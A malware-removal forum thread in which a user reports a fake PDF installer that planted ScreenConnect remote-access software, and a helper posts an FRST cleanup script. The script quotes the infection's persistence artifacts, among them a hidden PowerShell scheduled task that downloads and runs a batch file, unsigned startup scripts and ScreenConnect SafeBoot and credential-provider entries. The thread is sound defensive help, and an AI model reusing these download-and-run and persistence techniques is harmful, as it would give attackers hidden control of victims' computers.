Black Screen Window Appearing Constantly Believe It Is Connectwise Malware As Posted Previously

Discussion in 'Malware Help - MG (A Specialist Will Reply)' started by Devin Moriarty, May 7, 2025.

  1. Devin Moriarty

    Devin Moriarty Private E-2

    Dear Sirs and Madams:

    Very excited to see that you all are still here. You saved my computer in 2010 and I again Am seeking the assistance of the wise sages here. I have a problem with a black screen appearing on my windows screen as if i attempted to utilize the dos prompt.

    I download files for my father from different places using his computer (which i am now), and one had a file that caused an app from connectwise, LLC to be downloaded to my computer instead of myself accessing the pdf files that it purportedly contained. the file was i believe 2025_1023.exe and was supposed to lead to pdf files for his use as an attorney.

    I searched the site here and someone had sought your help with removing the connectwise virus that caused this to occur.

    I followed the request of the member responding and leading the needy through the process of cleaning the computer. I now need the same asssitance and have run the same programs as was requested of that individual and have the logs attached here using FRST64. FRST.txt Addition.txt, FVRST1.txt Fixlog.txt Search.txt and FIxlog2.txt. If i have to start over it wont be a problem. but if you can help from here or whatever i need to do I will follow your directions. Please let me know what to do from here.

    Thank You for existing and thank you for any assistance you can give.

    Much Appreciated.

    Devin
     

    Attached Files:

  2. Oh My!

    Oh My! Malware Expert Staff Member

    Greetings and welcome back to the Major Geeks Malware Forum.

    Please allow me some time to review what you have posted.

    I removed some personal identification information to protect your privacy.
     
  3. Devin Moriarty

    Devin Moriarty Private E-2

    Thank you my friend. I appreciate your assistance. the heading or path of the window is c:\windows\system 3 i believe but it flashes on and off and i cannot tell exactly what the path is for the appearing window. There is no system 3 however when i checked the directory for windows via dos. another strange system path was sysWOW64 in the same windows directory. Have not seen that before.

    Thanks for any effort you devote to this and for any assitence you can give. Much Appreciated.

    Devin
     
  4. Oh My!

    Oh My! Malware Expert Staff Member

    Thank you for your patience.

    Do you recognize Dualmon Remote Access?

    There are quite a number of .pdf files in the C:\Users\mmori\OneDrive\Documents folder. It would be helpful if you reviewed the files to identify any that are unknown or suspicious.

    There are numerous files similar to C:\ProgramData\F-[j0069]-[p01].bmp in the C:\ProgramData folder. Could you review the files to make sure they are legitimate.

    ===================================================

    Farbar Recovery Scan Tool Fix

    --------------------
    • Right click on the FRST64 icon and select Run as administrator
    • Highlight the below information then hit the Ctrl + C keys at the same time and the text will be copied
    • There is no need to paste the information anywhere, FRST64 will do it for you
    Code:
    Start::
    CreateRestorePoint:
    CloseProcesses:
    cmd: type "C:\Users\mmori\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\286c.bat"
    2025-05-06 14:06 - 2025-05-06 14:06 - 005658592 _____ C:\Users\mmori\Downloads\2025_1023 (14).exe
    2025-05-06 14:03 - 2025-05-06 14:03 - 005658592 _____ C:\Users\mmori\Downloads\2025_1023 (13).exe
    2025-05-06 12:02 - 2025-05-06 12:02 - 005658592 _____ C:\Users\mmori\Downloads\2025_1023 (12).exe
    2025-05-06 12:02 - 2025-05-06 12:02 - 005658592 _____ C:\Users\mmori\Downloads\2025_1023 (11).exe
    2025-05-06 12:01 - 2025-05-06 12:01 - 005658592 _____ C:\Users\mmori\Downloads\2025_1023 (9).exe
    2025-05-06 12:01 - 2025-05-06 12:01 - 005658592 _____ C:\Users\mmori\Downloads\2025_1023 (10).exe
    2025-05-06 07:13 - 2025-04-14 20:59 - 000118437 _____ C:\Users\mmori\dwm.bat
    2025-05-05 19:58 - 2025-05-05 19:58 - 005658592 _____ C:\Users\mmori\Downloads\2025_1023 (8).exe
    2025-05-05 19:41 - 2025-05-05 19:41 - 005658592 _____ C:\Users\mmori\Downloads\2025_1023 (7).exe
    2025-05-05 19:41 - 2025-05-05 19:41 - 005658592 _____ C:\Users\mmori\Downloads\2025_1023 (6).exe
    2025-05-05 19:14 - 2025-05-05 19:14 - 005658592 _____ C:\Users\mmori\Downloads\2025_1023 (5).exe
    2025-05-05 19:14 - 2025-05-05 19:14 - 005658592 _____ C:\Users\mmori\Downloads\2025_1023 (4).exe
    2025-05-05 19:11 - 2025-05-05 19:11 - 005658592 _____ C:\Users\mmori\Downloads\2025_1023 (3).exe
    2025-05-05 19:10 - 2025-05-05 19:10 - 005658592 _____ C:\Users\mmori\Downloads\2025_1023 (2).exe
    2025-05-05 19:10 - 2025-05-05 19:10 - 005658592 _____ C:\Users\mmori\Downloads\2025_1023 (1).exe
    2025-05-05 19:03 - 2025-05-05 19:04 - 005658592 _____ C:\Users\mmori\Downloads\2025_1023.exe
    Startup: C:\Users\mmori\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\286c.bat [2025-04-15] () [File not signed]
    Startup: C:\Users\mmori\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\94c1.bat [2025-04-15] () [File not signed]
    Startup: C:\Users\mmori\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\98c0.bat [2025-04-15] () [File not signed]
    Startup: C:\Users\mmori\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9dd0.bat [2025-04-15] () [File not signed]
    Startup: C:\Users\mmori\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bad6.bat [2025-04-15] () [File not signed]
    Startup: C:\Users\mmori\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c0a1.bat [2025-04-15] () [File not signed]
    Startup: C:\Users\mmori\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d37f.bat [2025-04-15] () [File not signed]
    Startup: C:\Users\mmori\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d396.bat [2025-04-15] () [File not signed]
    Task: {EA41F1A9-47BF-4824-BD03-28EBD4F65B74} - System32\Tasks\ipomic => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [454656 2025-03-11] (Microsoft Windows -> Microsoft Corporation) -> -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-WebRequest -Uri '' -OutFile 'C:\Users\Public\Downloads\clinoid.bat'; Start-Process 'C:\Users\Public\Downloads\clinoid.bat'"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ScreenConnect Client (fe821f0de5be6b92) => ""="Service" 
    Task: {077BA067-7C15-40F0-B22E-C9DC2A54B4A2} - System32\Tasks\Microsoft\Windows\Location\Notifications => %windir%\System32\LocationNotificationWindows.exe  (No File) 
    Task: {F3E6E7ED-A196-4E44-8803-55FAB3AD4E29} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker => %systemroot%\system32\MusNotification.exe  (No File) 
    ShellIconOverlayIdentifiers: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  -> No File 
    ShellIconOverlayIdentifiers: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} =>  -> No File 
    ShellIconOverlayIdentifiers: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} =>  -> No File 
    ShellIconOverlayIdentifiers: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  -> No File 
    ShellIconOverlayIdentifiers: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  -> No File 
    ShellIconOverlayIdentifiers: [ OneDrive6] -> {9AA2F32D-362A-42D9-9328-24A483E2CCC3} =>  -> No File 
    ShellIconOverlayIdentifiers: [ OneDrive7] -> {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} =>  -> No File 
    ShellIconOverlayIdentifiers-x32: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  -> No File 
    ShellIconOverlayIdentifiers-x32: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} =>  -> No File 
    ShellIconOverlayIdentifiers-x32: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} =>  -> No File 
    ShellIconOverlayIdentifiers-x32: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  -> No File 
    ShellIconOverlayIdentifiers-x32: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  -> No File 
    ShellIconOverlayIdentifiers-x32: [ OneDrive6] -> {9AA2F32D-362A-42D9-9328-24A483E2CCC3} =>  -> No File 
    ShellIconOverlayIdentifiers-x32: [ OneDrive7] -> {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} =>  -> No File 
    FirewallRules: [{A67EBCAB-07A8-4E9A-AAD3-BC270D72BB61}] => (Allow) C:\Users\mmori\AppData\Local\Temp\7zS5165\HP.EasyStart.exe => No File 
    FirewallRules: [{B81EBB03-9051-4CAD-85A8-02D98A459E79}] => (Allow) C:\Users\mmori\AppData\Local\Temp\7zS6A5E\HPEasyStart\HP.EasyStart.exe => No File 
    FirewallRules: [{F301115C-3516-4AE7-B78F-B06C0795E7DF}] => (Allow) C:\Users\mmori\AppData\Roaming\Zoom\bin\airhost.exe => No File 
    FirewallRules: [{E29B53D9-3C67-4019-88CF-1AC1D0753511}] => (Allow) C:\Users\mmori\AppData\Roaming\Zoom\bin\airhost.exe => No File 
    FirewallRules: [UDP Query User{65640E7E-A0BD-4C77-95F3-08E65AEB3594}C:\users\mmori\appdata\local\temp\7zs0786\enterprisedu.exe] => (Allow) C:\users\mmori\appdata\local\temp\7zs0786\enterprisedu.exe => No File 
    FirewallRules: [TCP Query User{D04F5391-6A7E-42D4-A1ED-2966EA19DAED}C:\users\mmori\appdata\local\temp\7zs0786\enterprisedu.exe] => (Allow) C:\users\mmori\appdata\local\temp\7zs0786\enterprisedu.exe => No File 
    FirewallRules: [{51834DD3-6AB5-4E6E-8461-591BAB0F74D1}] => (Allow) C:\WINDOWS\System32\DriverStore\FileRepository\asussci2.inf_amd64_4fc38a913e0f2ea5\ASUSLinkRemote\AsusLinkRemoteAgent.exe => No File 
    FirewallRules: [{8AC70EC0-1B4C-49CD-8092-A7AB33EE8213}] => (Allow) C:\WINDOWS\System32\DriverStore\FileRepository\asussci2.inf_amd64_4fc38a913e0f2ea5\ASUSLinkRemote\AsusLinkRemoteAgent.exe => No File 
    FirewallRules: [{0083DF83-B854-465C-B32E-45C13AAE9868}] => (Allow) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe => No File 
    C:\Users\mmori\AppData\Local\Temp\ScreenConnect
    C:\Users\mmori\AppData\Local\CrashDumps\ScreenConnect.WindowsFileManager.exe(1).8308.dmp
    C:\Users\mmori\AppData\Local\CrashDumps\ScreenConnect.WindowsFileManager.exe.8308.dmp
    C:\Users\mmori\AppData\Local\Apps\2.0\HX4QPEOQ.A8L
    ScreenConnect Client (fe821f0de5be6b92) (HKLM-x32\...\{ABC24F33-871C-4A06-3DA0-68FE937FCD73}) (Version: 24.4.4.9118 - ScreenConnect Software) 
    C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (fe821f0de5be6b92)
    C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_ScreenConnect.Wi_6c493adfd8256d2c8d12db37aeb2c9bc58cf3cfd_46055b62_ed8d733a-b9ac-461d-8b0c-853ed34e8fb5
    C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_ScreenConnect.Wi_fa1bdc7adef33bcad826c478c7fe5c62294cfcb4_46055b62_97cef4a4-7703-4855-9ef8-f0be7a5bbb2a
    DeleteValue: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-91DB-5EBDDA2F74DB}|""
    DeleteValue: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-91DB-5EBDDA2F74DB}\InprocServer32|""
    DeleteValue: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\33F42CBAC17860A4D30A86EF39F7DC37|ProductName
    DeleteValue: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\33F42CBAC17860A4D30A86EF39F7DC37\SourceList|PackageName
    DeleteValue: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\33F42CBAC17860A4D30A86EF39F7DC37\SourceList|LastUsedSource
    DeleteValue: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\33F42CBAC17860A4D30A86EF39F7DC37\SourceList\Net|1
    DeleteValue: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\sc-fe821f0de5be6b92\shell\open\command|""
    DeleteValue: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{6FF59A85-BC37-4CD4-91DB-5EBDDA2F74DB}|""
    DeleteValue: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders|C:\Program Files (x86)\ScreenConnect Client (fe821f0de5be6b92)\
    DeleteValue: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\326594B4082FA825A645513DA509CB2C|33F42CBAC17860A4D30A86EF39F7DC37
    DeleteValue: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\7CAED7D05A1956605384C02893DA47DD|33F42CBAC17860A4D30A86EF39F7DC37
    DeleteValue: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\8B957AEA6758945A39BE5FF5AF038BCC|33F42CBAC17860A4D30A86EF39F7DC37
    DeleteValue: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\AB50085D7C86741B2E6C310F2E5ED991|33F42CBAC17860A4D30A86EF39F7DC37
    DeleteValue: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\AFF382B5B13C219BB1499CF867DF1043|33F42CBAC17860A4D30A86EF39F7DC37
    DeleteValue: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\EEDBFA0AA5DF4A401B86E2C6CD9BCCB4|33F42CBAC17860A4D30A86EF39F7DC37
    DeleteValue: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\33F42CBAC17860A4D30A86EF39F7DC37\InstallProperties|InstallSource
    DeleteValue: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\33F42CBAC17860A4D30A86EF39F7DC37\InstallProperties|Publisher
    DeleteValue: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\33F42CBAC17860A4D30A86EF39F7DC37\InstallProperties|DisplayName
    DeleteValue: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ABC24F33-871C-4A06-3DA0-68FE937FCD73}|InstallSource
    DeleteValue: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ABC24F33-871C-4A06-3DA0-68FE937FCD73}|Publisher
    DeleteValue: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ABC24F33-871C-4A06-3DA0-68FE937FCD73}|DisplayName
    DeleteValue: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa|Authentication Packages
    DeleteValue: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ScreenConnect Client (fe821f0de5be6b92)|DeleteValue: HKEY_USERS\S-1-5-21-4225362807-1558528252-331994984-1001\Control Panel\NotifyIconSettings\1115882926046498339|ExecutablePath
    DeleteValue: HKEY_USERS\S-1-5-21-4225362807-1558528252-331994984-1001\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store|C:\Users\mmori\AppData\Local\Apps\2.0\HX4QPEOQ.A8L\GGPXX6DE.LXY\scre..tion_25b0fbb6ef7eb094_0017.0005_89e334e2ac76c220\ScreenConnect.ClientService.exe
    DeleteValue: HKEY_USERS\S-1-5-21-4225362807-1558528252-331994984-1001\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store|C:\Program Files (x86)\ScreenConnect Client (fe821f0de5be6b92)\ScreenConnect.WindowsFileManager.exe
    DeleteValue: HKEY_USERS\S-1-5-21-4225362807-1558528252-331994984-1001\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache|C:\Program Files (x86)\ScreenConnect Client (fe821f0de5be6b92)\ScreenConnect.WindowsFileManager.exe.FriendlyAppName
    DeleteValue: HKEY_USERS\S-1-5-21-4225362807-1558528252-331994984-1001\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache|C:\Program Files (x86)\ScreenConnect Client (fe821f0de5be6b92)\ScreenConnect.WindowsFileManager.exe.ApplicationCompany
    DeleteValue: HKEY_USERS\S-1-5-21-4225362807-1558528252-331994984-1001\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache|C:\Program Files (x86)\ScreenConnect Client (fe821f0de5be6b92)\ScreenConnect.WindowsClient.exe.FriendlyAppName
    DeleteValue: HKEY_USERS\S-1-5-21-4225362807-1558528252-331994984-1001\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache|C:\Program Files (x86)\ScreenConnect Client (fe821f0de5be6b92)\ScreenConnect.WindowsClient.exe.ApplicationCompany
    DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ScreenConnect_RASAPI32
    DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\ScreenConnect_RASMANCS
    DeleteKey: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ScreenConnect Client (fe821f0de5be6b92)
    DeleteKey: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\ScreenConnect
    DeleteKey: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ScreenConnect Client (fe821f0de5be6b92)
    DeleteKey: HKEY_USERS\S-1-5-21-4225362807-1558528252-331994984-1001\Software\Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0017.0005_none_a9f1e20719f27af1
    DeleteKey: HKEY_USERS\S-1-5-21-4225362807-1558528252-331994984-1001\Software\Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0017.0005_none_655b4392d5bd7c65
    DeleteKey: HKEY_USERS\S-1-5-21-4225362807-1558528252-331994984-1001\Software\Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0005_0e0b25ec73195629\scre...exe_25b0fbb6ef7eb094_0017.0005_none_a9f1e20719f27af1
    DeleteKey: HKEY_USERS\S-1-5-21-4225362807-1558528252-331994984-1001\Software\Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0017.0005_none_16aedbdb6b7cdfd0
    cmd: sfc /scannow
    cmd: DISM /Online /Cleanup-Image /CheckHealth
    End::
    
    • Click Fix
    • When completed the tool will create a log on the desktop called Fixlog.txt. Please copy and paste the contents of the file in your reply.
    ===================================================

    Things I would like to see in your next reply. Please be sure to copy and paste any requested log information unless you are asked to attach it.
    • Recognize Dualmon?
    • Reviewed files?
    • Fixlog
     
  5. Devin Moriarty

    Devin Moriarty Private E-2

    Will not be able to until later tonight, but your wish is my command. Thanks again. I will review the files and run the debugger again, and touch base around midnight if possible. If you are not a night owl like me, I am happy to even have any assistance in this matter, so if we have to wait until tomorrow to touch base again, i hope that is alright with yourself. Let me know if this is alright. Thank You.

    Devin
     
  6. Oh My!

    Oh My! Malware Expert Staff Member

    Perfectly fine.
     

MajorGeeks.Com Menu

Downloads All In One Tweaks \ Android \ Anti-Malware \ Anti-Virus \ Appearance \ Backup \ Browsers \ CD\DVD\Blu-Ray \ Covert Ops \ Drive Utilities \ Drivers \ Graphics \ Internet Tools \ Multimedia \ Networking \ Office Tools \ PC Games \ System Tools \ Mac/Apple/Ipad Downloads

Other News: Top Downloads \ News (Tech) \ Off Base (Other Websites News) \ Way Off Base (Offbeat Stories and Pics)

Social: Facebook \ YouTube \ Twitter \ Tumblr \ Pintrest \ RSS Feeds